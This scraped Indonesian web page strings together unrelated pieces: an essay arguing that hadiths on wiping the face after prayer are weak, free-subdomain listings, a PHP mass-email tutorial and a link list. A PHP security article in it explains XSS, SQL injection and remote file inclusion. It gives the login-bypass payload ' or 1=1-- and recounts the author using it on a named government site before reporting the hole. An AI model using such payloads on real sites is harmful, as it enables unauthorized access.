Tentang Mengusap Muka setelah berdoa

KELEMAHAN HADITS-HADITS

Tentang Mengusap Muka Dengan

Kedua Tangan Sesudah Selesai Berdo’a

Oleh

Abdul Hakim bin Amir Abdat

---

Pendahuluan.

Sering kita melihat diantara saudara-saudara kita apabila telah selesai berdo’a, kemudian mereka mengusap muka mereka dengan kedua telapak tangannya. Mereka yang mengerjakan demikian itu, ada yang sudah mengetahui dalilnya, tapi mereka tidak mengetahui derajat dari dalil tersebut. Apakah sah datang dari Nabi shallallau ‘alaihi wa sallam atau tidak .? Ada juga yang mengerjakan karena ikut-ikutan (taklid) saja.

Oleh karena itu jika ada orang bertanya kepada saya (Abdul Hakim bin Amir Abdat) : “Adakah dalilnya tentang mengusap muka dengan kedua telapak tangan sesudah selesai berdo’a, dan bagaimana derajatnya, sah atau tidak dari Nabi shallallahu ‘alaihi wa sallam ..? Maka saya menjawab ; “Bahwa tentang dalilnya ada beberapa riwayat yang sampai kepada kita, tapi tidak satupun yang sah (shahih atau hasan) datangnya dari Nabi shallallahu ‘alaihi wa sallam”.

Untuk itu ikutilah pembahasan saya di bawah ini, mudah-mudahan banyak membawa manfa’at bagi saudara-saudara.

Hadist Pertama

“Artinya : Dari Ibnu Abbas, ia berkata ;’Telah bersabda Rasulullah shallallahu ‘alaihi wa sallam : Apabila engkau meminta (berdo’a) kepada Allah, maka hendaklah engkau berdo’a dengan kedua telapak tanganmu, dan janganlah engkau berdo’a dengan kedua punggungnya. Maka apabila engkau telah selesai berdo’a, maka usaplah mukamu dengan kedua telapak tanganmu”. (Riwayat Ibnu Majah No. 1181 & 3866).

Hadits ini derajatnya sangatlah LEMAH/DLO’IF. Karena di sanadnya ada orang (rawi) yang bernama SHALIH BIN HASSAN AN-NADLARY. Para ahli hadits melemahkannya sebagaimana tersebut dibawah ini.

1. Kata Imam Bukhari : Munkarul Hadits (orang yang diingkari hadits/riwayatnya).
2. Kata Imam Abu Hatim : Munkarul Hadits, Dlo’if.
3. Kata Imam Ahmad bin Hambal : Tidak ada apa-apanya (maksudnya : lemah).
4. Kata Imam Nasa’i : Matruk (orang yang ditinggalkan haditsnya).
5. Kata Imam Ibnu Ma’in : Dia itu Dlo’if.
6. Imam Abu Dawud telah pula melemahkannya.

[Baca : Al-Mizanul 'Itidal jilid 2 halaman 291, 292).

Imam Abu Dawud juga meriwayatkan dari jalan Ibnu Abbas, tapi di sanadnya ada seorang rawi yang tidak disebut namanya (dalam istilah ilmu hadits disebut rawi MUBHAM). sedang Imam Abu Dawud sendiri telah berkata : "Hadits inipun telah diriwayatkan selain dari jalan ini, dari Muhammad bin Ka'ab al-Quradziy (tapi) SEMUANYA LEMAH. Dan ini jalan yang semisalnya, dan ia (hadits Ibnu Abbas) juga lemah". (Baca : Sunan Abi Dawud No. 1485).

Hadits Kedua

Telah diriwayatkan oleh Saa-ib bin Yazid dari bapaknya (Yazid) :

"Artinya : Bahwasanya Nabi shallallahu 'alaihi wa sallam, apabila beliau berdo'a mengangkat kedua tangannya, (setelah selesai) beliau mengusap mukanya dengan kedua (telapak) tanganya". (Riwayat : Imam Abu Dawud No. 1492).

Sanad hadits inipun sangat lemah, karena di sanadnya ada rawi-rawi :

1. IBNU LAHI'AH, seorang rawi yang lemah.
2. HAFSH BIN HASYIM BIN 'UTBAH BIN ABI WAQQASH, rawi yang tidak diketahui/dikenal (majhul).

[Baca : Mizanul 'Itidal jilid I hal. 569].

Hadits Ketiga.

Telah diriwayatkan oleh Umar bin Khattab, ia berkata :

“Artinya : Adalah Rasulullah shallallahu ‘alaihi wa sallam, apabila mengangkat kedua tangannya waktu berdo’a, beliau tidak turunkan kedua (tangannya) itu sehingga beliau mengusap mukanya lebih dahulu dengan kedua (telapak) tangannya”. (Riwayat : Imam Tirmidzi).

Hadits ini sangat lemah, karena disanadnya ada seorang rawi bernama HAMMAD BIN ISA AL-JUHANY.

1. Dia ini telah dilemahkan oleh Imam-imam : Abu Dawud, Abu Hatim dan Daruquthni.
2. Imam Al-Hakim dan Nasa’i telah berkata : Ia telah meriwayatkan dari Ibnu Juraij dan Ja’far Ash-Shadiq hadits-hadits palsu.

[Baca : Al-Mizanul 'Itidal jilid I hal. 598 dan Tahdzibut-Tahdzib jilid III hal. 18-19]

Syaikhul Islam Ibnu Taimiyah berkata :

“Adapun tentang Nabi shallallahu ‘alaihi wa sallam mengangkat kedua tangannya diwaktu berdo’a, maka sesungguhnya telah datang padanya hadits-hadits yang shahih (lagi) banyak (jumlahnya). Sedangkan tentang beliau mengusap mukanya dengan kedua (telapak) tangannya (sesudah berdo’a), maka tidak ada padanya (hadits yang shahih lagi banyak), kecuali satu-dua hadits yang tidak dapat dijadikan hujjah (alasan tentang bolehnya) dengan keduanya”. [Baca : Fatawa Ibnu Taimiyah jilid 22 hal. 519].

Saya (Abdul Hakim bin Amir Abdat) berkata : Bahwa perkataan Ibnu Taimiyah tentang Nabi shallallahu ‘alaihi wa sallam berdo’a dengan mengangkat kedua tangannya telah datang padanya hadits-hadits yang shahih lagi banyak, ini memang sudah betul dan tepat. Bahkan hadits-haditsnya dapat mencapai derajat mutawatir karena telah diriwayatkan oleh sejumlah sahabat.

Dibawah ini saya akan sebutkan sahabat yang meriwayatkannya dan Imam yang mengeluarkan haditsnya.

1. Oleh Abu Humaid (Riwayat Bukhari & Muslim).
2. Oleh Abdullah bin Amr bin Ash (Riwayat Bukhari & Muslim).
3. Oleh Anas bin Malik (Riwayat Bukhari) tentang Nabi berdo’a diwaktu perang Khaibar dengan mengangkat kedua tangannya.
4. Oleh Abu Musa Al-Asy’ari (Riwayat Bukhari dan lain-lain).
5. Oleh Ibnu Umar (Riwayat Bukhari).
6. Oleh Aisyah (Riwayat Muslim).
7. Oleh Abu Hurairah (Riwayat Bukhari).
8. Oleh Sa’ad bin Abi Waqqash (Riwayat Abu Dawud).

Dan lain-lain lagi shahabat yang meriwayatkan bahwa Nabi shallallahu ‘alaihi wa sallam, ada berdo’a dengan mengangkat kedua tangannya di berbagai tempat. Semua riwayat di atas (yaitu : tentang Nabi shallallahu ‘alaihi wa sallam berdo’a mengangkat kedua tangannya) adalah merupakan FI’IL (perbuatan) Nabi shallallahu ‘alaihi wa sallam. Adapun yang merupakan QAUL (perkataan/sabda) Nabi shallallahu ‘alaihi wa sallam, ada di riwayatkan oleh Malik bin Yasar (sahabat Nabi shallallahu ‘alaihi wa sallam, ia berkata : Telah bersabda Rasulullah shallallahu ‘alaihi wa sallam :

“Artinya : Apabila kamu meminta (berdo’a) kepada Allah, maka mintalah kepada-Nya dengan telapak tangan kamu, dan janganlah kamu meminta kepada-nya dengan punggung (tangan)”. (Shahih Riwayat : Abu Dawud No. 1486).

Kata Ibnu Abbas (sahabat Nabi shallallahu ‘alaihi wa sallam).

“Artinya : Permintaan (do’a) itu, yaitu : Engkau mengangkat kedua tanganmu setentang dengan kedua pundakmu”. (Riwayat Abu Dawud No. 1486).

Adapun tentang tambahan “mengusap muka dengan kedua telapak tangan sesudah selesai berdo’a” telah kita ketahui, semua riwayatnya sangat lemah dan tidak boleh dijadikan alasan tentang sunatnya sebagaimana dikatakan Syaikhul Islam Ibnu Taimiyah. Jadi yang sunahnya itu hanya mengangkat kedua telapak tangan waktu berdoa.

Adalagi diriwayatkan tentang mengangkat kedua tangan waktu berdo’a.

“Artinya ari Abu Hurairah, ia berkata : Telah bersabda Rasulullah shallallahu ‘alaihi wa sallam : ‘Wahai sekalian manusia ! Sesungguhnya Allah itu Baik, dan Ia tidak akan menerima kecuali yang baik. Dan sesungguhnya Allah telah perintahkan mu’minim sebagaimana Ia telah perintahkan Rasul, Ia berfirman : “Wahai para Rasul !.. Makanlah dari yang baik-baik, dan kerjakanlah amal shalih, sesungguhnya Aku dengan apa-apa yang kamu kerjakan maha mengetahui “. (Al-Mu’minun : 51). Dan Ia telah berfirman (pula) : “Wahai orang-orang yang beriman !. Makanlah dari yang baik-baik apa-apa yang Kami rizkikan kepada kamu”. (Al-Baqarah : 172). Kemudian Nabi shallallahu ‘alaihi wa sallam menyebutkan tentang seseorang yang mengadakan perjalanan jauh dengan rambut kusut-masai dan berdebu. (orang tersebut) mengangkat kedua tangannya ke langit (berdo’a) : Ya Rabbi ! Ya Rabbi ! (Kata Nabi shallallahu ‘alaihi wa sallam selanjutnya) : “Sedangkan makanannya haram dan minumannya haram dan pakaiannya haram dan diberi makan dengan yang haram, maka bagaimana dapat dikabulkan (do’a) nya itu”. (Shahih Riwayat Muslim 3/85).

Di hadits ini ada dalil tentang bolehnya mengangkat kedua tangan waktu berdo’a (hukumnya sunat). Ketika Nabi shallallahu ‘alaihi wa sallam, menceritakan tentang seseorang yang berdo’a sambil mengangkat kedua tangannya ke langit. Orang tersebut tidak dikabulkan do’anya karena : Makanan, minuman, pakaiannya, dan diberi makan dari barang yang haram atau hasil yang haram.

Kesimpulan

1. Tidak ada satupun hadits yang shahih tentang mengusap muka dengan kedua telapak tangan sesudah berdo’a. Semua hadits-haditsnya sangat dlo’if dan tidak boleh dijadikan alasan tentang sunatnya.
2. Karena tidak ada contohnya dari Rasulullah shallallahu ‘alaihi wa sallam, maka mengamalkannya berarti BID’AH.
3. Berdo’a dengan mengangkat kedua tangan hukumnya sunat dengan mengambil fi’il dan qaul Nabi shallallahu ‘alaihi wa sallam yang telah sah.
4. Ada lagi kebiasaan bid’ah yang dikerjakan oleh kebanyakan saudara-saudara kita yaitu : Mengusap muka dengan kedua telapak tangan atau satu telapak tangan sehabis salam dari shalat.

http://groups.yahoo.com/group/assunnah/message/210

domain gratis

Posted By :Phii Free Subdomain co.cc 17-11-2007 | 10:37:23 | Halaman Ini dibaca 11725 kali Halo temen-temen semua…. Ini ada free subdomain gratis lagi, namanya free domain co.cc. Namanya …

Posted By :areya@plasa.com Free subdomain uni.cc 18-10-2007 | 14:49:31 | Halaman Ini dibaca 6151 kali Teman kita areya@plasa.com memberitahukan kita bahwa ada sub domain gratis lagi kali ini sub domainnya uni.cc, prosesnya cukup …

Posted By :Safril B Nugroho Domain gratis Lagi… | .name | 15-08-2007 | 06:01:39 | Halaman Ini dibaca 10051 kali Selamat Pagi every body… ;p di pagi yang agak mendung ini aku pengen bagi2 domain gratis …

Posted By :Anggi Free Domain .tk 10-08-2007 | 17:26:55 | Halaman Ini dibaca 9646 kali Ini satu lagi ada domain gratis yang sudah lama, tapi belum kami tulis, Dot.tk sudah lama mengeluarkan …

Posted By :Safril Domain Gratis – coz.in 16-05-2007 | 15:30:52 | Halaman Ini dibaca 8897 kali Hallo semuanya, ni aku ada domain gratis baru, iseng-iseng browsing barusan…. hehehe….. ni mirip kayak …

Posted By :anggi Domain Gratis | CO.NR 18-03-2007 | 08:24:27 | Halaman Ini dibaca 12483 kali Teman-teman saya mau informasikan bahwa ada penyedia domain gratis yang lumayan bagus Domain tersebut berasal dari norwegia …

PHP Security – Cek Bug PHP Script

28-03-2008 | 15:24:58 | Halaman Ini dibaca 6166 kali

Setelah terampungkan script php yang telah kita buat ada  kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah  siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat  dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi  system.

Dan siapa sangka script php yang telah dibuat itu aman  dari kerentanan dalam masalah security. ~~~

Lalu, bagaimana mencegah sang hacker mengekploitasi,  bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui  script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua  ?? 

Sebelum kita beralih maju ke langkah selanjutnya ada  baiknya untuk mengenali bug popular yang paling sering diexploitasi.

Penulis akan mencoba untuk memberikan sedikit penjelasan,  bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content  Management system maupun yang lainnya. Di antaranya :

- XSS ( Cross Site Scripting )
- SQL Injection
- RFI ( Remote File Inclusion )

Cross Site Scriping
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi  karena tidak adanya filtering pada html maupun java script.

Tetapi pada dasarnya defacing ( perubahan kontent ) hanya  terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat  mencuri cookie  kemudian menggunakannya  untuk berbuat sesuatu yang … ~~

Contohnya :
http://www.banksumsel.com

SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker  yang mencoba melakukan inject query sql   melalui form ataupun via address bar pada browser internet.  Sebagai contohnya ketika penulis mencoba login  sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id  ).  Dengan menggunakan query ‘ or 1=1–  penulis pun berhasil login. Pada dasarnya ‘ atau single quote dan or 1=1– itu  berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh  server sql adalah menjalankan query ” select * “. Yang terjadi adalah  penulis diloloskan untuk login sebagai admin.

Berikut adalah gambar yang penulis capture ketika penulis  berhasil login sebagai admin pada situs http://www.sumsel.go.id

Gambar ini diambil sebelum penulis mengontak webmaster  via email untuk mempatch script phpnya.

RFI ( Remote File Inclusion )
Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika  melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut.  Apabila user memasukkan url evil script miliknya pada variable yang digunakan  dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut  dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan  command di server milik anda untuk merubah konten situs atau bahkan merusaknya.  ~~

Untuk contohnya silahkan anda cari di www.milw0rm.com ~

Keywordnya Remote File Inclusion. ~

Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm  … tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat  secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara  tidak sengaja maupun sengaja. ~

Pada dasarnya untuk mengecek bug dapat dilakukan secara  online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di  localhost anda ( offline ) saja.

Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda  adalah sebuah addons mozilla firefox yang disediakan secara gratis.  Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.

Tools tersebut dapat  anda download disini :
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection  digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena  penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax  sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah  digunakan telah disediakan untuk melakukan cek bug sql injection.

Anda dapat mendownloadnya disini :
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Penggunaanya pun tidak terlalu sulit.

Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler  interpreter ini nantinya digunakan untuk menjalankan script  inclusionscanner.pl.
Dan kemudian copykan inclusionscanner.pl tersebut ke  direktori c:\perl\bin

Langkah selanjutnya :

1. Masukkan  script  yang akan anda scan kedalam sebuah direktori di c:\perl php.

ex : c:\perl\wordpress.

2. Masuk ke command prompt, start | run | cmd | enter

3.  Setelah itu  masuk ke direktory c:\perl\bin, cd c:\perl\bin

4. Jalankan scriptnya,

C:\Perl\bin>perl.exe inclusionscanner.pl

#Will check a directory for all includes and unsets

#Coded by Ironfist (ironsecurity.nl)

#Usage: create a folder in your perlfolder and put the  files to be scanned in it

, next type the folder name below (eg myfolder)

#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM

Directory to read? c:\perl\wp

kemudian lihat hasilnya di c:\perl\bin\result.html

berikut hasil scan ketika penulis mencoba untuk melakukan  cek inclusion pada wordpress-2.3.3 :

FOUND: require_once($locale_file);
in c:\perl\wp/wp-settings.php FOUND:  require_once($import_root . ‘/’ . $file);
in c:\perl\wp/wp-admin/import.php FOUND:  include_once($this->PluginDir . “class-smtp.php”);
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.’phpmailer.lang-’.$lang_type.’.php’);
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.’phpmailer.lang-en.php’);
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND:  require_once($_template_file);
in c:\perl\wp/wp-includes/theme.php

woww !!! ~~ silahkan di exploitasi eh di patch script  milik anda. ~~

Ingat, jangan merusak, jangan berbuat vandal, jika anda  menemukan bug di situs lain seperti yang telah saya sebutkan diatas, silahkan  beritahu pihak admin.greetz to : ilmuwebsite staff, member ilmuwebsite,

special for jojo and her baby.

mass email

Mengirim Email massal

25-05-2008 | 09:02:41 | Halaman Ini dibaca 856 kali

Pasti anda tidak asing lagi dengan yang namanya email massal. Yah, email massal merupakan metode pengiriman email ke beberapa orang sekaligus.Biasanya Yahoo mail, gmail, dan beberapa web mail lainnya telah menyediakan fitur ini. Bahkan bisa dibilang semuanya pasti sudah menyediakan. Nah, kalau selama ini kita hanya menggunakan fasilitas tersebut, bagaimana jika kita membuatnya sendiri ? Tentu lebih bangga bukan ?

Pertama-tama buat databasenya terlebih dahulu.

CREATE DATABASE `emailmassal` ;

CREATE TABLE `emailmassal`.`email` (
`id` MEDIUMINT( 8 ) NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`nama` VARCHAR( 50 ) NOT NULL ,
`email` VARCHAR( 50 ) NOT NULL
) ENGINE = MYISAM
INSERT INTO `emailmassal`.`email` (
`id` ,
`nama` ,
`email`
)
VALUES (
‘1′, ‘ivan’, ‘ivan@ilmuwebsite.com’
);

Notes : dalam contoh ini, email yang terdapat di database Cuma 1. Anda dapat menambah email-email lain jika mau.

config.php

<?php
class config {
var $host = “localhost”;
var $user = “root”;
var $pass = “”;
var $nama_db = “emailmassal”; // nama database
function config() {
$this->connect = mysql_connect($this->host,$this->user,$this->pass);
$this->select_db = mysql_select_db($this->nama_db);
if(!$this->connect)
{
print “<center>Gagal koneksi dengan PHPmyAdmin.. !<br>Cek kembali nama host, user, dan password anda !</center>”;
}
} // tutup function config
}
?>

Index.php

<?php
include(“config.php”);
?>
<form name=”form1″ method=”post” action=”?kirim=mail”>
<p>
Untuk : <br>
<select name=”to” id=”to”>
<?php
class daftar extends config {
var $sql = “SELECT * FROM email”;
function email () {
$this->query = mysql_query($this->sql);
print “<option value=semua selected=selected>-Semua email-</option>”;
while($this->run_query = mysql_fetch_array($this->query))
{
print “<option value=”.$this->run_query['email'].”>”.$this->run_query['email'].”</option>”;
}
} // end function email
}
$p = new daftar();
$p->email();
?>
</select>
</p>
<p>Subject :<br>
<input name=”pesan” type=”text” id=”pesan”>
</p>
<p>Pesan :<br>
<textarea name=”pesan” cols=”40″ rows=”5″ id=”pesan”></textarea>
</p>
<p>
<input type=”submit” name=”Submit” value=”Kirim &gt;&gt;”>
</p>
</form>
<?php
if($_GET['kirim'])
{
class email extends daftar {
function kirimmail () {
$to = $_POST['to'];
$subject = $_POST['subject'];
$pesan = $_POST['pesan'];
$from = “From: email anda”; // isi dengan email anda
if($to == “semua”)
{
$this->query = mysql_query($this->sql);
while($this->run_query = mysql_fetch_array($this->query))
{
mail($to,$subject,$pesan,$from);
}
}
else
{
mail($to,$subject,$pesan,$from);
}
} // end function kirimmail
} // end class
$m = new email();
$m->kirimmail();
}
?>

Sedikit Penjelasan kode diatas :

Pada class config, kita variabelkan nama host,user,dan pass. Lalu kita konekkan dengan database pada function config. Function config itulah yang dinamakan constructor. Pada index.php, terdapat class daftar extends config, gunanya adalah untuk mengkonekkan dengan database, lalu kita variabelkan $sql yang merupakan perintah query. Lalu perintah query tersebut kita wariskan ke class email. Gunanya adalah agar tidak perlu melakukan penulisan ulang query tersebut.

Yah, sekian dulu lah penjelasan dari saya. Jika ada yang ingin ditanyakan, silahkan menghubungi saya di :

Email 1 : ivan@ilmuwebsite.com
Email 2 : ivan_wen_piao@yahoo.co.id
URL : http://ivan.ilmuwebsite.com

Silahkan download sourcenya Disini

Implementasi Boleh | Copy Paste Dilarang

Cool Link

http://www.raihmasadepan.com/
http://relizers.ueuo.com/
http://nuky-syawaludin.blogspot.com/
http://www.dwiprastya.com/
http://www.keranjangiklan.com/
http://www.tbm110.blogspot.com/
http://tahutik.blogspot.com/
http://www.hadoitz.co.cc/
http://www.ilmuwebsite.com/style.css
http://www.ilmuwebsite.com/style.css
http://www.agenrumahjogja.blogspot.com/
http://www.tatacip.com/
http://computer-business-internet.blogspot.com/
http://agoescatoer.wordpress.com/
http://budimeeong.wordpress.com/
http://www.gajahpesing.web.id/
http://rumahonline.blogspot.com/
http://angkatansatu.blogspot.com/
http://www.procot.co.cc/
http://www.rumahsakitherbal.com/
http://www.bniprimadana2000.blogspot.com/
http://www.ebook2010.com/
http://www.magneeforce.blogspot.com/
http://miabu.wordpress.com/
http://affif.bluemeda.com/
http://dayakcinta.com/
http://www.smpn12tng-cyberclub.blogspot.com/
http://jossgandos.co.cc/
http://www.hadoitz.890m.com/
http://thecosmo.wordpress.com/
http://www.lapak-online.com/cd-hacking/
http://www.bamby.web.id/
http://www.torekasi.com/
http://www.hantuceria.co.nr/
http://campursari-classic.blogspot.com/
http://settinghandphone.blogspot.com/
http://dictionaryindonesia.blogspot.com/
http://www.aresboyolali.co.nr/
http://asalcoret.wordpress.com/
http://blobix.blogspot.com/
http://palembangcenter.com/
http://www.ilmuwebsite.com/search/
http://www.ilmuwebsite.com/hacking/
http://www.ilmuwebsite.com/detil_hacking/12/_Tekhnik_Exploit_Password_WinXP/
http://wakita.com/
http://kumpulanskripsi.com/
http://abulizz.wordpress.com/
http://dsolution.wordpress.com/
http://www.toprangking.com/
http://www.perguruannurkaromah.tk/
http://www.mobile-cellular.co.nr/
http://www.pusatcomputerbali.com/
http://studyw.blogspot.com/
http://iklansatu.blogspot.com/
http://restonmyownworld.co.nr/
http:///
http://www.ilmuwebsite.com/detil_hacking/12/_Tekhnik_Exploit_Password_WinXP/OPHCRACK
http://immankiky.wordpress.com/
http:///
http://robby-binus.blogspot.com/
http://smkn1-pst.sch.id/
http://ciftronik.com/
http://darkpluto.wordpress.com/
http://scienceofanime.blogspot.com/
http://pojokindo.blogspot.com/
http://www.digitalstudiocollege.com/
http://allmyfree.wordpress.com/
http://www.jurmansyah.net/
http://akbarindonesia.wordpress.com/
http://tribun-indonesia.blogspot.com/
http://roensil.blogspot.com/
http://spreadthehopes.blogspot.com/
http://www.suhandi.co.nr/
http://hidayat06.wordpress.com/
http://new-dinar-iraqi.blogspot.com/
http://www.alvitomusic.com/
http://tears-off.blogspot.com/
http://anggiawan.web.id/
http://www.marzx.com/
http://yudhi19.wordpress.com/
http://xrdiscominblog.blogspot.com/
http://www.indeecom.co.nr/
http://www.sampara.com/
http://www.encus.uni.cc/
http://www.nerrocellular.blogspot.com/
http://www.softwarebalischool.blogspot.com/
http://www.bizniz-online.com/
http://duitgratis.fren.jp/
http://my-heart-contents.blogspot.com/
http://ardisweb.phpnet.us/
http://gambarterapi.freetzi.com/
http://ardisweb.phpnet.us/
http://onesetiawan.blogspot.com/
http://lilblog.multiply.com/
http://jerman90.wordpress.com/
http://easygraphic.50webs.com/
http://kamuspece.blogspot.com/
http://www.barudak.info/
http://www.toserbatutorial.com/
ymsgr:sendIM?b_scorpio_ilmuwebsite
ymsgr:sendIM?al_k_ym
ymsgr:sendIM?flore_ephi
ymsgr:sendIM?bn.safril
http://www.ilmuwebsite.com/detil_news/44/Icon_Gratis_-_3D_Animal_Smile/
http://www.ilmuwebsite.com/detil_news/42/Google_Keyboard_Shortcuts_Beta/
http://www.hrxoneblog.com/
http://gerbangaceh.blogspot.com/
http://www.iklanyuk.com/
http://smkn3batu.tk/
http://willmen46.wordpress.com/
http://smkn3batu.wordpress.com/
http://hyper-88.freehostia.com/
http://anggasanjaya.xniffer.uni.cc/
http://www.teknisi.co.cc/
http://forum.dudung.net/index.php/topic,7155.0/topicseen.html
http://www.ilmuwebsite.com/detil_news/41/Download_Semua_Ebook_Tutorial_PHP_ilmuwebsite/
http://www.ilmuwebsite.com/detil_php_kuliah/15/Lebih_dalam_mengenal_array/
http://www.ilmuwebsite.com/detil_php_kuliah/14/Menangkap_Variabel_Post/
http://www.ilmuwebsite.com/detil_php_kuliah/13/Membuat_login_ala_cpanel/
http://www.ilmuwebsite.com/detil_php_tutorial/36/Membuat_Grafik_Data_Vertikal_dengan_PHP/
http://www.ilmuwebsite.com/detil_php_tutorial/35/URL_Mod_Rewrite_Part_2_-_htaccess/
http://www.ilmuwebsite.com/detil_php_tutorial/32/Mengirim_Email_massal/
http://www.ilmuwebsite.com/detil_html/13/Membuat_Status_YM/
http://www.ilmuwebsite.com/detil_html/12/Tutorial_Ultimate_Mendapatkan_Website_Gratis_Full/
http://www.ilmuwebsite.com/detil_html/11/Membuat_Logo_Pada_Addres_Bar/
http://www.job.web.id/
http://bob.web.id/
http://nursalim.blogsome.com/
http://henny-destinaku.blogspot.com/
http://rosihanari.net/
http://www.maniakgamer.com/
http://allcolection.wordpress.com/
http://perogram.wordpress.com/
http://blog.erry.web.id/
http://nunubh.wordpress.com/
http://www.ilmuwebsite.com/detil_javascript/13/Membuat_pertanyaan_konfirmasi/
http://www.ilmuwebsite.com/detil_javascript/12/Tulisan_Matrix/
http://www.ilmuwebsite.com/detil_javascript/11/Hujan_Cinta/
http://www.ilmuwebsite.com/detil_search_engine_artikel/6/Bagaimana_Seharusnya_Penggunaan_Image_dan_Flash/
http://www.ilmuwebsite.com/detil_search_engine_artikel/5/Mobile_Search_dan_Masa_Depan_Search_Engine_2010/
http://www.ilmuwebsite.com/detil_search_engine_artikel/4/Mendapatkan_Link_Popularity_dari_Artikel_Directory/
http://www.ilmuwebsite.com/detil_search_engine_tutorial/3/Make_Over_Meta_Description_Anda/
http://www.ilmuwebsite.com/detil_search_engine_tutorial/2/Pengenalan_dan_Panduan_Google_Webmaster_Tools/
http://www.ilmuwebsite.com/detil_search_engine_tutorial/1/Membuat_Halaman_Web_Menjadi_Search_Engine_Friendly/
http://www.ilmuwebsite.com/detil_photoshop/11/Sony_Ericsson_Logo/
http://www.ilmuwebsite.com/detil_photoshop/10/USB_Flash_Drive_Illustration/
http://rgesit.blogsome.com/
http://nanang.serverku.com/
http://www.bwancat3.blogspot.com/
http://humanartproduction.blogspot.com/
http://www.patriawebhost.com/
http://wox.cutedoctor.net/
http://irenkdesign.wordpress.com/
http://privateclopedia.wordpress.com/
http://www.adhewoelan.blogspot.com/
http://ivansuckcu.wordpress.com/2007/07/24/macromedia-flash-webdesign/
http://www.ilmuwebsite.com/detil_photoshop/9/Cool_3D_Logo/
http://www.ilmuwebsite.com/detil_coreldraw/7/Teknik_Gambar_Bentuk_Bagian_1/
http://www.ilmuwebsite.com/detil_coreldraw/6/Membuat_Butiran_Air/
http://www.ilmuwebsite.com/detil_coreldraw/5/CorelDraw_11_Portable_Githu_Loh_…/
http://www.ilmuwebsite.com/detil_flash/8/Rotasi_Gambar_dengan_Action_Script/
http://www.ilmuwebsite.com/detil_flash/7/Membuat_Flash_Icon_Animasi/
http://www.ilmuwebsite.com/detil_flash/6/Membuat_Trail_Mouse/
http://www.ilmuwebsite.com/detil_domain_registration/8/Free_Subdomain_co.cc/
http://www.ilmuwebsite.com/detil_domain_registration/7/Free_subdomain_uni.cc/
http://www.ilmuwebsite.com/detil_domain_registration/6/Domain_gratis_Lagi…_|_.name_|/
http://kreatif-pisan.blogspot.com/
http://privateclopedia.wordpress.com/
http://www.dremi.info/
http://xzan-infokom.info/
http://www.portalindo.com/
http://www.arifrohmanhakim.blogspot.com/
http://aufclarung.blogs.ie/
http://www.klik-kanan.com/forums/index.php?topic=5270.0
http://sanblok.wordpress.com/
http://zvtral.freehostia.com/
http://www.ilmuwebsite.com/detil_hosting_service/5/000webhost_-_Hosting_gratis_PHP_SQL/
http://www.ilmuwebsite.com/detil_hosting_service/4/Free_Host_PHP/
http://www.ilmuwebsite.com/detil_hosting_service/3/AwardSpace_|_Free_PHP_MySql/
http://www.ilmuwebsite.com/detil_review_software/5/Download_FTP_FileZilla/
http://www.ilmuwebsite.com/detil_review_software/4/SmartFTP_Software_FTP_Terbaik/
http://www.ilmuwebsite.com/detil_review_software/3/Process_Explorer_v11.04/
http://www.ilmuwebsite.com/detil_hacking/16/PHP_Security_-_Cek_Bug_PHP_Script/
http://www.ilmuwebsite.com/detil_hacking/15/Hacking_Video_-_Career_Academy_Hacking/
http://www.ilmuwebsite.com/detil_hacking/14/CD_Hacking_Tools_2007_-_Gratis/
http://www.ilmuwebsite.com/Cara-Ikut-Promosi-Iklan-Gratis.html
http://pendidikan.net/mod.php?mod=katalog&op=viewlink&cid=348
http://darminto.web.id/
http://www.dotastatus.isgreat.org/
http://sasmoko.blogspot.com/
http://wd4.blogspot.com/
http://vandhie.blogspot.com/
http://www.andhikaza.page.tl/
http://juwarto.wordpress.com/
